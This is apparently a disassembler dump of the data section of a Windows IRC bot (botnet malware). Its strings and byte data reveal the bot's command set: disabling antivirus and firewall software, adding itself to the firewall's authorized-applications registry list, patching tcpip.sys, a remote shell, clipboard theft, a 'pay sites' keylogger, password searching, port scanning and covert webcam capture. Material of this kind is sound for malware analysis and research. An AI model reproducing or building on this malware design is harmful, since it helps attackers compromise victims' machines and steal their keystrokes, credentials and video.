aIrofferV1_3b10 db 'iroffer v1.3b10 [Ud2 23874155], http://iroffer.org/',0
; DATA XREF: ___:off_42EE40�o
a@arrapao db '*@arrapao',0 ; DATA XREF: ___:off_42EE3C�o
align 4
unk_4348AC db 2 ; DATA XREF: ___:0040F1AA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToStartR db ' Failed to start registry thread, error: <%d>.',0
align 4
unk_4348F8 db 2 ; DATA XREF: ___:0040F157�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aRegistryMonito db ' Registry monitor active.',0
align 10h
unk_434930 db 2 ; DATA XREF: ___:0040F137�o
; sub_40F6F1+60CB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToStar_6 db ' Failed to start secure thread, error: <%d>.',0
align 4
unk_43497C db 2 ; DATA XREF: ___:0040F0EA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSystemSecureMo db ' System secure monitor active.',0
align 4
unk_4349B8 db 2 ; DATA XREF: ___:0040F0CA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStartA db 'Failed to start AV/FW killer thread, error: <%d>.',0
align 4
unk_434A0C db 2 ; DATA XREF: ___:0040F07A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAvFwKillerActi db 'AV/FW Killer active.',0
align 4
dword_434A44 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: ___:0040F03F�o
dd 2BBBB02h, 6F422020h, 74732074h, 65747261h, 2E64h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: ___:0040EFF9�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
align 4
aSEnabledS db '%s:*:Enabled:%s',0 ; DATA XREF: ___:0040EFD2�o
aSDS db '%s %d "%s"',0 ; DATA XREF: ___:0040EECD�o
align 10h
a_n_z_m_Patcher db '.n.z.m. (patcher.p.l.g) .»». TCPIP.SYSPatcher.',0
aSDriversTcpip_ db '%s\drivers\tcpip.sys',0 ; DATA XREF: sub_40F326+139�o
align 4
dword_434B48 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F326+F4�o
dd 2BBBB02h
aConnectedToS_ db ' Connected to %s.',0
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40F576+65�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40F576+35�o
align 4
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+6409�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+63F4�o
align 4
dword_434BBC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+63E7�o
dd 2BBBB02h
aUserSLoggedIn_ db ' User: %s logged in.',0
align 4
dword_434BEC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+63CA�o
dd 2BBBB02h
aPasswordAccept db ' Password accepted.',0
align 4
dword_434C1C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+635A�o
dd 2BBBB02h
aFailedHostAuth db ' *Failed host auth by: (%s!%s).',0
align 4
dword_434C58 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+62FC�o
dd 2BBBB02h
aFailedPassAuth db ' *Failed pass auth by: (%s!%s).',0
align 4
aNoticeSYouVeBe db 'NOTICE %s :You',27h,'ve been logged.',0Dh,0Ah,0
; DATA XREF: sub_40F6F1+62ED�o
; sub_40F6F1+634B�o
align 4
aNoticeSNiceTry db 'NOTICE %s :Nice try, idiot. (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40F6F1+62D9�o
; sub_40F6F1+6337�o
align 10h
asc_434CE0: ; DATA XREF: sub_40F6F1+62A9�o
unicode 0, <~>,0
dword_434CE4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+6258�o
dd 2BBBB02h
aRandomNickChan db ' Random nick change: %s',0
align 4
dword_434D18 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+6179�o
dd 2BBBB02h
aInvalidLoginSl db ' Invalid login slot number: %d.',0
align 4
dword_434D54 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+6171�o
dd 2BBBB02h
aNoUserLoggedIn db ' No user logged in at slot: %d.',0
align 10h
dword_434D90 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+60FB�o
dd 2BBBB02h, 73252020h, 0
dword_434DB0 dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_40F6F1+6055�o
dd 2202967h, 2002BBBBh, 20732520h, 74737973h, 2E6D65h
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_40F6F1+604F�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_40F6F1+6048�o
align 10h
aSec db 'sec',0 ; DATA XREF: sub_40F6F1+5FF0�o
aSecure db 'secure',0 ; DATA XREF: sub_40F6F1+5FDD�o
align 4
unk_434DFC db 2 ; DATA XREF: sub_40F6F1+5FD0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_7 db 'Failed to start server thread, error: <%d>.',0
dword_434E44 dd 69026602h, 6966646Eh, 1F651F6Ch, 2E2Ehdword_434E54 dd 646E6946h, 6C696620h, 65hdword_434E60 dd 72027002h, 1F631F6Fh, 2E2Ehdword_434E6C dd 636F7250h, 20737365h, 7473696Ch, 0dword_434E7C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5E59�o
dd 2BBBB02h, 65522020h, 6E6E6F63h, 69746365h, 2E676Eh
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1:loc_41553F�o
align 4
dword_434EBC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5E39�o
dd 2BBBB02h, 69442020h, 6E6F6373h, 7463656Eh, 2E676E69h
dd 0
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1:loc_41551F�o
align 10h
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+5E0A�o
align 4
dword_434F0C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5DC0�o
dd 2BBBB02h
aStatusReady_Bo db ' Status: Ready. Bot Uptime: %s.',0
align 4
dword_434F48 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5D84�o
dd 2BBBB02h, 6F422020h, 44492074h, 7325203Ah, 2Eh
dword_434F70 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40F6F1+5D59�o
dd 2029671Fh, 2BBBB02h
aFailedToStartL db ' Failed to start list thread, error: <%d>.',0
dword_434FB8 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40F6F1+5CEE�o
dd 2029671Fh, 2BBBB02h, 694C2020h, 74207473h, 61657268h
dd 2E7364h
dword_434FE4 dd 627573h dword_434FE8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5C7C�o
dd 2BBBB02h, 6C412020h, 20736169h, 7473696Ch, 2Eh
dword_435010 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5C63�o
dd 2BBBB02h
aFailedToStar_8 db ' Failed to start listing thread, error: <%d>.',0
align 4
dword_435058 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5BD9�o
dd 2BBBB02h, 694C2020h, 6E697473h, 6F6C2067h, 2E67h
dword_435080 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5B5A�o
dd 2BBBB02h, 654E2020h, 726F7774h, 6E49206Bh, 2E6F66h
dword_4350A8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5B2F�o
dd 2BBBB02h, 79532020h, 6D657473h, 666E4920h, 2E6Fh
dword_4350D0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5AE2�o
dd 2BBBB02h, 65522020h, 69766F6Dh, 4220676Eh, 2E746Fh
unk_4350F8 db 2 ; DATA XREF: sub_40F6F1+5ACF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_9 db 'Failed to start listing thread, error: <%d>.',0
align 4
dword_435148 dd 7A026E02h, 201F6D1Fh, 6F727028h, 73736563h, 702E7365h
; DATA XREF: sub_40F6F1+5A60�o
dd 671F6C1Fh, 0BB022029h, 202002BBh, 636F7250h, 73736563h
dd 73696C20h, 2E74h
aFull db 'full',0 ; DATA XREF: sub_40F6F1+5A40�o
align 10h
unk_435180 db 2 ; DATA XREF: sub_40F6F1+59EB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAlreadyRunning db 'Already running.',0
align 4
unk_4351B4 db 2 ; DATA XREF: sub_40F6F1+59BF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 64h, 6Bh
db 65h ; e
db 79h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSearchComplete db ' Search completed.',0
align 4
dword_4351E4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5977�o
dd 2BBBB02h, 70552020h, 656D6974h, 7325203Ah, 2Eh
dword_43520C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_414FA8�o
dd 2BBBB02h
aRemoteShellRea db ' Remote shell ready.',0
align 4
dword_43523C dd 7A026E02h, 201F6D1Fh, 646D6328h db 2Eh
byte_435249 db 70h, 1Fh, 6Ch ; DATA XREF: ___:off_424C74�o
dd 2029671Fh, 2BBBB02h
aCouldnTOpenRem db ' Couldn',27h,'t open remote shell.',0
align 4
dword_435274 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5896�o
dd 2BBBB02h
aRemoteShellAlr db ' Remote shell already running.',0
dword_4352AC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5880�o
dd 2BBBB02h, 65472020h, 6C432074h, 6F627069h, 2E647261h
dd 0
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_40F6F1+5856�o
align 4
unk_4352EC db 2 ; DATA XREF: sub_40F6F1:loc_414F37�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushA db ' Failed to flush ARP cache.',0
align 4
unk_435328 db 2 ; DATA XREF: sub_40F6F1+582B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aArpCacheFlushe db ' ARP cache flushed.',0
align 4
unk_43535C db 2 ; DATA XREF: sub_40F6F1:loc_414F0C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToLoadDn db ' Failed to load dnsapi.dll.',0
align 4
unk_435398 db 2 ; DATA XREF: sub_40F6F1:loc_414F05�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushD db ' Failed to flush DNS cache.',0
align 4
unk_4353D4 db 2 ; DATA XREF: sub_40F6F1+580D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDnsCacheFlushe db ' DNS cache flushed.',0
align 4
unk_435408 db 2 ; DATA XREF: sub_40F6F1+57A5�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_10 db 'Failed to start server thread, error: <%d>.',0
unk_435450 db 2 ; DATA XREF: sub_40F6F1+5626�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_11 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_435498 db 2 ; DATA XREF: sub_40F6F1+54F7�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAlreadyRunni_0 db ' Already running.',0
unk_4354C4 db 2 ; DATA XREF: sub_40F6F1+54DB�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_12 db ' Failed to start search thread, error: <%d>.',0
unk_435510 db 2 ; DATA XREF: sub_40F6F1+545B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForPa db ' Searching for password.',0
unk_435548 db 2 ; DATA XREF: sub_40F6F1+5378�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSPortScanStart db ' %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 10h
dword_4355C0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+5143�o
dd 2BBBB02h
aNickChangedToS db ' Nick changed to: ',27h,'%s',27h,'.',0
align 4
dword_4355F4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+512A�o
dd 2BBBB02h
aJoinedChannelS db ' Joined channel: ',27h,'%s',27h,'.',0
dword_435624 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+510A�o
dd 2BBBB02h
aPartedChannelS db ' Parted channel: ',27h,'%s',27h,'.',0
dword_435654 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+50F1�o
dd 2BBBB02h, 52492020h, 61522043h, 25203A77h, 2E73h
dword_43567C dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40F6F1:loc_414764�o
dd 2029671Fh, 2BBBB02h
aFailedToKillTh db ' Failed to kill thread: %s.',0
align 4
dword_4356B8 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40F6F1+506C�o
dd 2029671Fh, 2BBBB02h
aKilledThreadS_ db ' Killed thread: %s.',0
align 4
dword_4356EC dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40F6F1:loc_414717�o
dd 2029671Fh, 2BBBB02h
aNoActiveThread db ' No active threads found.',0
align 4
dword_435724 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40F6F1+501C�o
dd 2029671Fh, 2BBBB02h
aStoppedDThread db ' Stopped: %d thread(s).',0
align 4
aAll db 'all',0 ; DATA XREF: sub_40F6F1+5002�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+4F77�o
; sub_40F6F1:loc_41550B�o
align 10h
dword_435770 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4EEF�o
dd 2BBBB02h
aPrefixChangedT db ' Prefix changed to: ',27h,'%c',27h,'.',0
align 4
unk_4357A4 db 3 ; DATA XREF: sub_40F6F1:loc_4145CB�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 73h
db 68h ; h
db 65h, 2 dup(6Ch)
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5CouldnTOpenFi db '5 Couldn',27h,'t open file: %s',0
align 4
unk_4357E8 db 3 ; DATA XREF: sub_40F6F1+4ED0�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 73h
db 68h ; h
db 65h, 2 dup(6Ch)
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5FileOpenedS db '5 File opened: %s',0
align 4
dword_435824 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4EA7�o
dd 2BBBB02h
aServerChangedT db ' Server changed to: ',27h,'%s',27h,'.',0
align 4
dword_435858 dd 7A026E02h, 201F6D1Fh, 736E6428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_414549�o
dd 2BBBB02h
aCouldnTResol_0 db ' Couldn',27h,'t resolve hostname.',0
align 10h
dword_435890 dd 7A026E02h, 201F6D1Fh, 736E6428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4E2D�o
dd 2BBBB02h
aLookupSS_ db ' Lookup: %s -> %s.',0
unk_4358BC db 2 ; DATA XREF: sub_40F6F1:loc_4144EA�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToTermin db 'Failed to terminate process: %s',0
unk_4358FC db 2 ; DATA XREF: sub_40F6F1+4DEF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aProcessKilledS db 'Process killed: %s',0
align 10h
unk_435930 db 2 ; DATA XREF: sub_40F6F1:loc_41448A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToTerm_0 db 'Failed to terminate process ID: %s',0
align 4
unk_435974 db 2 ; DATA XREF: sub_40F6F1+4D92�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aProcessKilledI db 'Process killed ID: %s',0
align 4
dword_4359AC dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40F6F1+4D51�o
dd 0BBBB0220h, 44202002h, 74656C65h, 27206465h, 2E277325h
dd 0
dword_4359D8 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4CCC�o
dd 2BBBB02h
aSendFileSUserS db ' Send File: %s, User: %s.',0
align 4
dword_435A0C dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40F6F1+4C5A�o
dd 0BBBB0220h, 4C202002h, 3A747369h, 732520h
unk_435A30 db 2 ; DATA XREF: sub_40F6F1+4C3F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_13 db 'Failed to start connection thread, error: <%d>.',0
dword_435A7C dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40F6F1+4BD0�o
dd 0BB022029h, 202002BBh, 3A4C5255h, 2E732520h, 0
dword_435AA4 dd 7A026E02h, 201F6D1Fh, 72696D28h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40F6F1:loc_414252�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 7320646Eh, 2E746E65h
dd 0
unk_435AD0 db 2 ; DATA XREF: sub_40F6F1+4B57�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Dh, 69h, 72h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientNotOpen_ db ' Client not open.',0
dword_435AFC dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4B26�o
dd 2BBBB02h, 6F432020h, 6E616D6Dh, 203A7364h, 7325h
dword_435B24 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4B1B�o
dd 2BBBB02h
aErrorSendingTo db ' Error sending to remote shell.',0
align 10h
dword_435B60 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4ACC�o
dd 2BBBB02h
aReadFileFailed db ' Read file failed: %s',0
align 10h
dword_435B90 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4AB8�o
dd 2BBBB02h
aReadFileComple db ' Read file complete: %s',0
align 4
a_n_z_m_Keylo_4 db '.n.z.m. (keylog.p.l.g) .»». Unknow mode type.',0
; DATA XREF: sub_40F6F1:loc_414138�o
align 4
a_n_z_m_Keylo_3 db '.n.z.m. (keylog.p.l.g) .»». Failed to start logging thread, erro'
; DATA XREF: sub_40F6F1+4A3D�o
db 'r: <%d>.',0
align 10h
a_n_z_m_Keylo_2 db '.n.z.m. (keylog.p.l.g) .»». Normal key logger active.',0
; DATA XREF: sub_40F6F1+49C5�o
align 4
aNormal_0 db 'normal',0 ; DATA XREF: sub_40F6F1+4978�o
align 10h
a_n_z_m_Keylo_1 db '.n.z.m. (keylog.p.l.g) .»». Pay sites key logger active.',0
; DATA XREF: sub_40F6F1+4970�o
align 4
aPay db 'pay',0 ; DATA XREF: sub_40F6F1+4911�o
a_n_z_m_Keylo_0 db '.n.z.m. (keylog.p.l.g) .»». Already running.',0
; DATA XREF: sub_40F6F1+48F1�o
align 10h
a_n_z_m_Keylog_ db '.n.z.m. (keylog.p.l.g) .»».',0 ; DATA XREF: sub_40F6F1+48CC�o
aKeylog_0 db 'Keylog',0 ; DATA XREF: sub_40F6F1+48C7�o
align 4
dword_435D14 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1:loc_413FAB�o
dd 2029671Fh, 2BBBB02h
aInvalidParam_0 db ' Invalid parameters for amateur video capture.',0
dword_435D60 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1:loc_413FA1�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCapt db ' Error while capturing amateur video from webcam.',0
align 10h
